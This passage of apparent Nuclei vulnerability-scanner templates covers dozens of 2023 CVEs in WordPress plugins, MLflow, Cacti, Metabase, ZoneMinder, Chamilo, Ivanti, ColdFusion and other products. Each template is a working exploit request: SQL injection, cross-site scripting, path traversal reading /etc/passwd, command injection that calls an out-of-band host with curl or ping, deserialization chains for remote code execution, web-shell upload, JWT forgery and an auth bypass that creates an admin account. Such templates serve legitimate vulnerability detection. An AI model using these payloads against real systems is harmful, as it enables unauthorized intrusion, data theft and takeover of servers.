    ') ","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-0261","info":{"name":"WordPress WP TripAdvisor Review Slider <10.8 - Authenticated SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\ncontent-type: application/x-www-form-urlencoded\n\naction=parse-media-shortcode&shortcode=[wptripadvisor_usetemplate+tid=\"1+AND+(SELECT+42+FROM+(SELECT(SLEEP(6)))b)\"]\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(content_type_2, \"application/json\")","contains(body_2, \"\\\"data\\\":{\")"],"condition":"and"}]}]},{"id":"CVE-2023-3849","info":{"name":"mooDating 1.2 - Cross-site scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/find-a-matchpksyk\">s9a64?"],"matchers":[{"type":"dsl","dsl":["status_code == 404","contains(content_type, \"text/html\")","contains(body, \">s9a64\") && contains(body, \"mooDating\")"],"condition":"and"}]}]},{"id":"CVE-2023-0678","info":{"name":"PHPIPAM \n foo\n \n java.lang.Comparable\n \n \n \n curl\n http://{{interactsh-url}}/\n \n \n start\n \n \n\n"],"matchers":[{"type":"dsl","dsl":["compare_versions(version, \"<4.4.1\")","contains(interactsh_protocol, \"dns\")","status_code_1 == 200 && status_code_2 == 500"],"condition":"and"}],"extractors":[{"type":"regex","part":"body_1","name":"version","group":1,"regex":["(.*)"],"internal":true}]}]},{"id":"CVE-2023-2356","info":{"name":"Mlflow <2.3.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{str}}\"}\n","POST /api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{str}}\", \"source\": \"file://{{Hostname}}/../../../../../../../\"}\n","GET /model-versions/get-artifact?path=etc/passwd&name={{str}}&version={{version}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\"version\": \"([0-9.]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-2227","info":{"name":"Modoboa < 2.1.0 - Improper Authorization","severity":"critical"},"requests":[{"raw":["GET /api/v2/parameters/core/ HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: 7h3h4ckv157\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["label\":","default_password\":","authentication_type\":\"local"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-35158","info":{"name":"XWiki - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xwiki/bin/view/XWiki/Main?xpage=restore&showBatch=true&xredirect=javascript:alert(document.domain)"],"matchers":[{"type":"dsl","dsl":["contains(body, \"href=\\\"javascript:alert(document.domain)\\\">Cancel\")","contains(header, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-5863","info":{"name":"phpMyFAQ < 3.2.0 - Cross-site Scripting","severity":"medium"},"requests":[{"raw":["GET /admin/index.php?action=ngductung\">","phpMyFAQ"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-34598","info":{"name":"Gibbon v25.0.0 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?q=./gibbon.sql"],"matchers-condition":"and","matchers":[{"type":"word","words":["phpMyAdmin SQL Dump","gibbon"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-35159","info":{"name":"XWiki >= 3.4-milestone-1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xwiki/bin/deletespace/Sandbox/?xredirect=javascript:alert(document.domain)","{{BaseURL}}/bin/deletespace/Sandbox/?xredirect=javascript:alert(document.domain)"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["javascript:alert(document.domain)","deletespace.Sandbox"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200,401]}]}]},{"id":"CVE-2023-4173","info":{"name":"mooSocial 3.1.8 - Reflected XSS","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/classified/%22%3E%3Cimg%20src=a%20onerror=alert('document.domain')%3E/search?category=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["","mooSocial"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2023-39361","info":{"name":"Cacti 1.2.24 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /graph_view.php?action=tree_content&node=1-1-tree_anchor&rfilter=%22or+%22%22%3D%22%28%28%22%29%29%3BSELECT+SLEEP%2810%29%3B--+- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=10","status_code == 200","contains_all(body, \"Tree Mode\", \"cacti\")"],"condition":"and"}]}]},{"id":"CVE-2023-33439","info":{"name":"Faculty Evaluation System v1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /ajax.php?action=login HTTP/1.1\nHost:{{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nemail={{username}}&password={{password}}&login=1\n","GET /admin/manage_task.php?id=1%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ HTTP/1.1\nHost:{{Hostname}}\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"Fatal error:\")","contains(body, \"XPATH syntax error:\")"],"condition":"and"}]}]},{"id":"CVE-2023-39024","info":{"name":"Harman Media Suite <= 4.2.0 - Local File Disclosure","severity":"high"},"requests":[{"raw":["GET /userportal/api/rest/contentChannels/?startIndex=0&pageSize=4&sort=TIME&showType=all HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"plcm-content-channel\", \"privacy\", \"coverImage\")","contains(content_type, \"application/vnd.plcm.plcm-content-channel-list+json\")","status_code == 200"],"condition":"and","internal":true}],"extractors":[{"type":"regex","name":"channelId","group":1,"regex":["\"channelId\":\"([^\"]+)\""],"internal":true}]},{"raw":["GET /userportal/api/rest/contentChannels/{{channelId}}/archives/?startIndex=0&pageSize=15&sort=time&onlyIncludeApproved=true HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"callId\", \"displayName\", \"duration\")","contains(content_type, \"application/vnd.plcm.plcm-csc+json\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-0600","info":{"name":"WP Visitor Statistics (Real Time Traffic) < 6.9 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Real Time Traffic"]}]},{"raw":["@timeout: 30s\nGET /?wmcAction=wmcTrack&siteId=34&url=test&uid=01&pid=02&visitorId={{str}}%27,sleep(6),0,0,0,0,0);--+- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"sleep(6)\")"],"condition":"and"}]}]},{"id":"CVE-2023-49103","info":{"name":"OwnCloud - Phpinfo Configuration","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/{{rand_base(4)}}.css","{{BaseURL}}/owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/{{rand_base(4)}}.css"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PHP Extension","PHP Version","owncloud"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-29919","info":{"name":"SolarView Compact <= 6.00 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["POST /texteditor.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndirectory=%2F/etc&open=%8AJ%82%AD&r_charset=none&newfile=&editfile=%2Fhome%2Fcontec%2Fdata%2FoutputCtrl%2Fremote%2F2016%2F\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["action=\"texteditor.php\"","adduser.conf","deluser.conf"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-30210","info":{"name":"OURPHP <= 7.2.0 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/client/manage/ourphp_tz.php?act=rt&callback="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["","barmemCachedPercent","swapPercent"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-43208","info":{"name":"NextGen Healthcare Mirth Connect - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /api/server/version HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: OpenAPI\n","POST /api/users HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: OpenAPI\nContent-Type: application/xml\n\n\n abcd\n \n java.lang.Comparable\n \n \n \n \n java.lang.Runtime\n \n \n getMethod\n \n java.lang.String\n [Ljava.lang.Class;\n \n \n getRuntime\n \n \n \n \n invoke\n \n java.lang.Object\n [Ljava.lang.Object;\n \n \n \n \n \n \n \n exec\n \n java.lang.String\n \n \n nslookup {{interactsh-url}}\n \n \n \n \n transform\n \n compareTo\n \n \n \n\n"],"matchers":[{"type":"dsl","dsl":["compare_versions(version, \"<4.4.1\")","contains(interactsh_protocol, \"dns\")","status_code_1 == 200 && status_code_2 == 500"],"condition":"and"}],"extractors":[{"type":"regex","part":"body_1","name":"version","group":1,"regex":["(.*)"],"internal":true}]}]},{"id":"CVE-2023-26035","info":{"name":"ZoneMinder Snapshots - Command Injection","severity":"critical"},"requests":[{"raw":["GET /index.php HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"csrf_token","group":1,"regex":["csrfMagicToken = \\\"(key:[a-f0-9]{40},\\d+)"],"internal":true}]},{"raw":["POST /index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nview=snapshot&action=create&monitor_ids[0][Id]=;ping+{{interactsh-url}}&__csrf_magic={{csrf_token}}\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")"]}]}]},{"id":"CVE-2023-3845","info":{"name":"MooDating 1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/friends/ajax_invitej7hrg%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3ef26v4?mode=model"],"matchers":[{"type":"dsl","dsl":["status_code == 404","contains(content_type, \"text/html\")","contains_all(body, \">\", \"mooDating\")"],"condition":"and"}]}]},{"id":"CVE-2023-0514","info":{"name":"Membership Database <= 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/admin.php?page=member-database%2Flist_members.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=sort&where=id&operator=%3D&value=asd%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%2F%2F&sortBy=id&ascdesc=asc\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"\")","contains(body_2, \"Member Database\")"],"condition":"and"}]}]},{"id":"CVE-2023-3844","info":{"name":"MooDating 1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/friendsslty3%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3er5c3m/ajax_invite?mode=model"],"matchers":[{"type":"dsl","dsl":["status_code == 404","contains(content_type, \"text/html\")","contains_all(body, \">r5c3m\", \"mooDating\")"],"condition":"and"}]}]},{"id":"CVE-2023-4542","info":{"name":"D-Link DAR-8000-10 - Command Injection","severity":"critical"},"requests":[{"raw":["POST /app/sys1.php HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\n\ncmd=id\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-22893","info":{"name":"Strapi Versions <=4.5.6 - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /api/auth/cognito/callback?access_token={{to_lower(rand_text_alpha(8))}}&id_token=eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.{{base64(payload)}}. HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"provider\":","\"confirmed\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"json","part":"body","name":"token","json":[".jwt"]}]}]},{"id":"CVE-2023-4547","info":{"name":"SPA-Cart eCommerce CMS 1.9.0.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search?filtered=1&q=test&filter[price]=100-1331\">&filter[attr][Memory][]=16+GB","{{BaseURL}}/search?filter[brandid]=vnxjb\">bvu51"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["100-1331\">",">bvu51"],"condition":"or"},{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-43472","info":{"name":"MLFlow < 2.8.1 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/2.0/preview/mlflow/experiments/list"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"experiment_id\\\":\", \"artifact_location\\\":\", \"lifecycle_stage\\\":\")","contains(header, \"application/json\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-38646","info":{"name":"Metabase < 0.46.6.1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /api/session/properties HTTP/1.1\nHost: {{Hostname}}\n","POST /api/setup/validate HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n \"token\":\"{{token}}\",\n \"details\":{\n \"details\":{\n \"subprotocol\":\"h2\",\n \"classname\":\"org.h2.Driver\",\n \"advanced-options\":true,\n \"subname\":\"mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM '{{file}}'//\\\\;\"\n },\n \"name\":\"{{randstr}}\",\n \"engine\":\"postgres\"\n }\n}\n"],"extractors":[{"type":"json","part":"body_1","name":"token","json":[".[\"setup-token\"]"],"internal":true}],"matchers":[{"type":"dsl","dsl":["contains_any(body_2, \"Syntax error in SQL statement\",\"NoSuchFileException\")","status_code_2 == 400"],"condition":"and"}]}]},{"id":"CVE-2023-3368","info":{"name":"Chamilo LMS <= v1.11.20 Unauthenticated Command Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/main/webservices/additional_webservices.php"],"headers":{"Content-Type":"application/xml"},"body":"\n\n \n \n \n \n file_data\n \n \n \n file_name\n $(curl http://{{interactsh-url}}/)\n \n \n service_ppt2lp_size\n 720x540\n \n \n \n \n\n","matchers-condition":"and","matchers":[{"type":"status","status":[200]},{"type":"word","words":["wsConvertPptResponse"],"part":"body"},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2023-27584","info":{"name":"Dragonfly2 < 2.1.0-beta.1 - Hardcoded JWT Secret","severity":"critical"},"requests":[{"raw":["GET /api/v1/users HTTP/1.1\nHost: {{Hostname}}\nCookie: jwt={{generate_jwt(payload,\"HS256\",\"Secret Key\") }}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"id\":","\"created_at\":","\"updated_at\":","\"state\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-30534","info":{"name":"Cacti < 1.2.25 Insecure Deserialization","severity":"medium"},"requests":[{"raw":["GET /index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n__csrf_magic={{url_encode(csrf_token)}}&action=login&login_username={{username}}&login_password={{password}}\n","POST /managers.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=actions&action_receiver_notifications=1&selected_items=a%3A2%3A%7Bi%3A7%3Ba%3A1%3A%7Bi%3A0%3BO%3A18%3A%22phpseclib%5CNet%5CSSH1%22%3A2%3A%7Bs%3A6%3A%22bitmap%22%3Bi%3A1%3Bs%3A6%3A%22crypto%22%3BO%3A19%3A%22phpseclib%5CCrypt%5CAES%22%3A8%3A%7Bs%3A10%3A%22block_size%22%3BN%3Bs%3A12%3A%22inline_crypt%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A25%3A%22phpseclib%5CCrypt%5CTripleDES%22%3A6%3A%7Bs%3A10%3A%22block_size%22%3Bs%3A30%3A%221%29%7B%7D%7D%7D%3B+ob_clean%28%29%3Blsdie%28%29%3B+%3F%3E%22%3Bs%3A12%3A%22inline_crypt%22%3BN%3Bs%3A16%3A%22use_inline_crypt%22%3Bi%3A1%3Bs%3A7%3A%22changed%22%3Bi%3A0%3Bs%3A6%3A%22engine%22%3Bi%3A1%3Bs%3A4%3A%22mode%22%3Bi%3A1%3B%7Di%3A1%3Bs%3A26%3A%22_createInlineCryptFunction%22%3B%7Ds%3A16%3A%22use_inline_crypt%22%3Bi%3A1%3Bs%3A7%3A%22changed%22%3Bi%3A0%3Bs%3A6%3A%22engine%22%3Bi%3A1%3Bs%3A4%3A%22mode%22%3Bi%3A1%3Bs%3A6%3A%22bitmap%22%3Bi%3A1%3Bs%3A6%3A%22crypto%22%3Bi%3A1%3B%7D%7D%7Di%3A7%3Bi%3A7%3B%7D&drp_action=2&__csrf_magic={{url_encode(csrf_token)}}\n","GET /clog.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body_4","regex":["\\s*([\\s\\S]*unserialize[\\s\\S]*managers.php[\\s\\S]*[Aa]uthenticated)"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf_token","part":"body","group":1,"regex":["var csrfMagicToken = ['\"]([a-z0-9,:;]*)['\"]"],"internal":true}]}]},{"id":"CVE-2023-38192","info":{"name":"SuperWebMailer 9.00.0.01710 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /superadmincreate.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nPassword=a\">&PasswordAgain=b&Language=de&SubmitBtn=Nutzer+erstellen\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Password\" value=\"a\">","SuperWebMailer"],"condition":"and","case-insensitive":true},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6623","info":{"name":"Essential Blocks < 4.4.3 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?rest_route=%2Fessential-blocks%2Fv1%2Fproducts&is_frontend=true&attributes={\"__file\":\"/etc%2fpasswd\"}","{{BaseURL}}/wp-content/plugins/essential-blocks/readme.txt"],"matchers":[{"type":"dsl","dsl":["status_code == 200","regex('root:.*:0:0:', body_1)","contains(body_2, \"Essential Blocks \u2013 Page\")"],"condition":"and"}]}]},{"id":"CVE-2023-39007","info":{"name":"OPNsense - Cross-Site Scripting to RCE","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{{para}}={{value}}&usernamefld={{username}}&passwordfld={{password}}&login=1\n","GET /ui/cron/item/open/0'+alert(document.domain)+' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["openDialog('0'+alert(document.domain)+''"]},{"type":"word","part":"header_3","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"para","part":"body","group":1,"regex":["type=\"hidden\" name=\"([a-zA-Z0-9]+)\" value=\"([A-Z0-9a-z]+)\" autocomplete=\""],"internal":true},{"type":"regex","name":"value","part":"body","group":2,"regex":["type=\"hidden\" name=\"([a-zA-Z0-9]+)\" value=\"([A-Z0-9a-z]+)\" autocomplete=\""],"internal":true}]}]},{"id":"CVE-2023-0334","info":{"name":"ShortPixel Adaptive Images < 3.6.3 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?SPAI_VJS=%3C/script%3E%3Cimg%20src%3D1%20onerror%3Dalert(document.domain)%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"shortpixel\") && contains(body, \"\")"],"condition":"and"}]}]},{"id":"CVE-2023-29300","info":{"name":"Adobe ColdFusion - Pre-Auth Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST ///CFIDE/adminapi/accessmanager.cfc?method=foo&_cfclient=true HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargumentCollection=
    {{jndi}}\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")","contains(body, \"ColdFusion documentation\")"],"condition":"and"}]}]},{"id":"CVE-2023-43654","info":{"name":"PyTorch TorchServe SSRF","severity":"critical"},"requests":[{"raw":["POST /models?url=http%3a//{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Java"]},{"type":"word","part":"content_type","words":["application/json"]}]}]},{"id":"CVE-2023-4220","info":{"name":"Chamilo LMS <= 1.11.24 - Remote Code Execution","severity":"medium"},"requests":[{"raw":["POST /main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------SwxF5rRaZb4lETWlpulXn3\n\n--------------------------SwxF5rRaZb4lETWlpulXn3\nContent-Disposition: form-data; name=\"bigUploadFile\"; filename=\"{{filename}}.txt\"\nContent-Type: application/octet-stream\n\n{{md5(num)}}\n\n--------------------------SwxF5rRaZb4lETWlpulXn3--\n","GET /main/inc/lib/javascript/bigupload/files/{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2,\"{{md5(num)}}\")","status_code_1 == 200 && status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2023-3836","info":{"name":"Dahua Smart Park Management - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1\nContent-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT\nHost: {{Hostname}}\n\n--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT\nContent-Disposition: form-data; name=\"upload\"; filename=\"{{random_str}}.jsp\"\nContent-Type: application/octet-stream\nContent-Transfer-Encoding: binary\n\n{{match_str}}\n--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--\n","GET /upload/emap/society_new/{{shell_filename}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 200 && status_code_2 == 200","contains(body_2, '{{match_str}}')"],"condition":"and"}],"extractors":[{"type":"regex","name":"shell_filename","internal":true,"part":"body_1","regex":["ico_res_(\\w+)_on\\.jsp"]}]}]},{"id":"CVE-2023-0947","info":{"name":"Flatpress < 1.3 - Path Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/fp-content/","{{BaseURL}}/flatpress/fp-content/"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"Index of /fp-content\")"],"condition":"and"}]}]},{"id":"CVE-2023-47105","info":{"name":"Chaosblade < 1.7.4 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /chaosblade?cmd=$(id) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"uid=\", \"code\", \"success\\\":false\", \"error\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-38964","info":{"name":"Academy LMS 6.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/home/courses?query=\">"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains_all(body, \"\", \"All courses\")"],"condition":"and"}]}]},{"id":"CVE-2023-6977","info":{"name":"Mlflow <2.8.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\"}\n","POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\",\"source\":\"//proc/self/root\"}\n","GET /model-versions/get-artifact?name={{randstr}}&path=etc%2Fpasswd&version=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"word","part":"header_3","words":["filename=passwd","application/octet-stream"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-35078","info":{"name":"Ivanti Endpoint Manager Mobile (EPMM) - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/mifs/aad/api/v2/admins/users"],"max-size":100,"matchers":[{"type":"dsl","dsl":["contains_all(body, 'results','userId','name')","contains(header, 'application/json')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-34192","info":{"name":"Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting","severity":"critical"},"requests":[{"raw":["POST /zimbra/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nloginOp=login&username={{username}}&password={{password}}&client=preferred\n","GET /h/autoSaveDraft?draftid=aaaaaaaaaaa%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cbbbbbbbb HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["","zimbra"],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","part":"header_2","status":[200]}]}]},{"id":"CVE-2023-6329","info":{"name":"Control iD iDSecure - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /api/login/unlockGetData HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["serial"],"condition":"and","internal":true}],"extractors":[{"type":"json","part":"body","name":"serial","internal":true,"json":[".serial"]}]},{"raw":["POST /api/login/ HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"passwordCustom\": \"{{javascript_response}}\", \"passwordRandom\": \"{{passwordRandom}}\"}\n"],"matchers":[{"type":"word","part":"body","words":["accessToken"],"condition":"and","internal":true}],"extractors":[{"type":"json","part":"body","name":"access-token","internal":true,"json":[".accessToken"]}]},{"raw":["POST /api/operator/ HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer {{access-token}}\nContent-Type: application/json\n\n{\"idType\": \"1\", \"name\": \"{{username}}\", \"user\": \"{{username}}\", \"newPassword\": \"{{password}}\", \"password_confirmation\": \"{{password}}\"}\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type, \"application/json\")","contains_all(body, \"code\", \"newID\")"],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["\"USER: \"+ username","\"PASS: \"+ password"]}]}]},{"id":"CVE-2023-33510","info":{"name":"Jeecg P3 Biz Chat - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/chat/imController/showOrDownByurl.do?dbPath=../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-45542","info":{"name":"MooSocial 3.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search/index/?q=test%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3etest"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"\", \"mooSocial\")"],"condition":"and"}]}]},{"id":"CVE-2023-2822","info":{"name":"Ellucian Ethos Identity CAS - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cas/logout?url=https://oast.pro\">"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["","Identity 